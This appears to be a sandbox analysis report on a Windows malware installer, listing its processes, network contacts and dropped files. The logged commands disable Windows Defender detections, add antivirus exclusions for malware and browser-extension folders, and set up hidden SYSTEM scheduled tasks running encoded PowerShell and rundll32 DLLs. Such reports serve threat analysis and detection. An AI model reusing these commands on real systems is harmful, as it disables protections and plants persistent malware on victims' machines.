"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gVtYcbMGj" /SC once /ST 00:10:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gVtYcbMGj"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gVtYcbMGj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 00:01:30 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe\" 0c /koGldiddT 385121 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\TmQUsxW.exe 0c /koGldiddT 385121 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4512 -ip 4512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 1056

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\uQQtmT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\XoMgzde.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\TNLDjta.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\DbzOWdt.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\Tmqpqut.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\EArZmcm.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 00:37:39 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\VXXfDzST\sBYgQOf.dll\",#1 /BqddidLgpG 385121" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\VXXfDzST\sBYgQOf.dll",#1 /BqddidLgpG 385121

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\VXXfDzST\sBYgQOf.dll",#1 /BqddidLgpG 385121

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2072 -ip 2072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 1040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1836 -ip 1836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 2280

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 152.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 74.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 api2.check-data.xyz udp
US 44.237.26.169:80 api2.check-data.xyz tcp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 169.26.237.44.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS4A38.tmp\Install.exe

MD5 27ac45acebe576d24f84ca8dadc355c3
SHA1 6640bf3cfa9d0610f3150d45a52f88145c4799e2
SHA256 32e6e4acc8ea46841ad65af928c7aff9fcc1224cb5f6ba557c30f8133a440b7a
SHA512 29fc5116e32bc12a8f386ee824bd6d44824acc1c22cb4c8856fbc8e9076e12d24d77d3fd85294d5adc2ff199f8b11dcf3ecb6e3ea3d8cb65d8accf0f46e60b2e

C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe

MD5 a5dca05edc6eda6e2acfe7ca41641cc5
SHA1 b772813e63a424ae31a2bd75c0067be03aae0165
SHA256 986e2f087fe32332daf7215461a103fa25d86209ab704e29a81dc419435367ae
SHA512 c3d865918176c064e638d2c892cb2ef45bc722fa9f3b4e1fb10ca6886054ff2d37cd9fd97fff08cdd95a017374109495bf48069fdc67355b34729fae654da2ed

memory/3164-12-0x00000000029F0000-0x0000000002A26000-memory.dmp

memory/3164-13-0x00000000053B0000-0x00000000059D8000-memory.dmp

memory/3164-14-0x0000000005A40000-0x0000000005A62000-memory.dmp

memory/3164-16-0x0000000005C50000-0x0000000005CB6000-memory.dmp

memory/3164-15-0x0000000005BE0000-0x0000000005C46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cj1g0hac.a4b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3164-26-0x0000000005CD0000-0x0000000006024000-memory.dmp

memory/3164-27-0x00000000062E0000-0x00000000062FE000-memory.dmp

memory/3164-28-0x0000000006310000-0x000000000635C000-memory.dmp

memory/3164-29-0x0000000007290000-0x0000000007326000-memory.dmp

memory/3164-31-0x0000000006820000-0x0000000006842000-memory.dmp

memory/3164-30-0x00000000067D0000-0x00000000067EA000-memory.dmp

memory/3164-32-0x00000000078E0000-0x0000000007E84000-memory.dmp

memory/2072-35-0x0000000010000000-0x00000000105CF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 def65711d78669d7f8e69313be4acf2e
SHA1 6522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256 aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA512 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

memory/1592-47-0x0000000006330000-0x0000000006684000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 92c1d0806f06b63d65569cd60e65adc0
SHA1 660a5e4462feb5f97d2ffdf52b23f6f90b7db652
SHA256 6821189cfde3e5ae88ae81e3acc2a2db3e8add3e397f8c1abb5f52b89b6e5438
SHA512 2b3ff8f60be81067c77cfe26332745879625a805f9de05cc478c7da8f9b91bb98cc61a83249fa09599ff8669ab57798c40f8f2c66ff1129496d9b7d6279199d2

memory/1592-50-0x00000000069B0000-0x00000000069FC000-memory.dmp

memory/2456-63-0x0000000005140000-0x0000000005494000-memory.dmp

memory/4512-66-0x0000000010000000-0x00000000105CF000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7a98638ece469710544f555fda7bc70f
SHA1 c037421a7f7d602dbed7837d808fe08d8997cbbe
SHA256 107ae6f36c43c774eb7887c062adb2398d9ad131805e7cceb907ce432091a94c
SHA512 ef70ccc93580236914e82c57fea2dfdb5af5eeb7d8de9456864c62d03cd1379c082cab92a4f1e183090acac7953bb2cac439760b923c4d40cf940f3957363a7d

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 951bee6e7c6bcdb2348e7da8bebbc2b2
SHA1 94597f0d06211660e953ea6694e029564e7bcc87
SHA256 3d4c8466595538a53422c9be882a66cb11829277b03211342977f9b0c585e597
SHA512 fadefed8c63c4c6c3f2a43418cc69d3391ad5f67068dbd1520099cc44fadbb23f4ae68cfc70f2a39143c125675f28317ca1f40cabf12be6c77419b3b82c03fcd

memory/5044-94-0x0000024D7C670000-0x0000024D7C692000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e9a8b22e0c8becdeb9b956bf28660f39
SHA1 e93d27b79079e070ce92d9c262857b3ade803ebf
